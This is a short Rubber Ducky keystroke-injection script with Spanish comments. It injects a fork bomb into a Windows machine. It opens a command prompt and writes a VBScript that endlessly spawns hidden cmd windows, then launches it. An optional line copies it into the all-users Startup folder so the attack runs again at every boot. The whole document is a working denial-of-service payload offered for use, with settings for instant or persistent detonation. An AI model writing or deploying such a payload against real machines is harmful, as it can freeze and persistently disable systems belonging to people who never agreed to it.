REM ATENCION! Este payload crea un ForkBomb que explota al inciar Windows. Usar con precaución
REM CONFIGURADOR del forkbomb: InstaBoom / PersisBoom

GUI r
DELAY 300
STRING cmd 
ENTER

DELAY 500

REM Activa esta línea para hacer la bomba persistente (recuerda abrir la consola para tener permisos de admin)
REM STRING cd %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\

REM STRING mode con:cols=18 lines=1&color FE

ENTER
STRING copy con a.vbs
ENTER
STRING do
ENTER
STRING CreateObject("Wscript.Shell").Run "cmd", 0, False
ENTER
STRING loop
CTRL z
ENTER

REM Si no quieres que explote al instante, desactiva esta línea
STRING start a.vbs
ENTER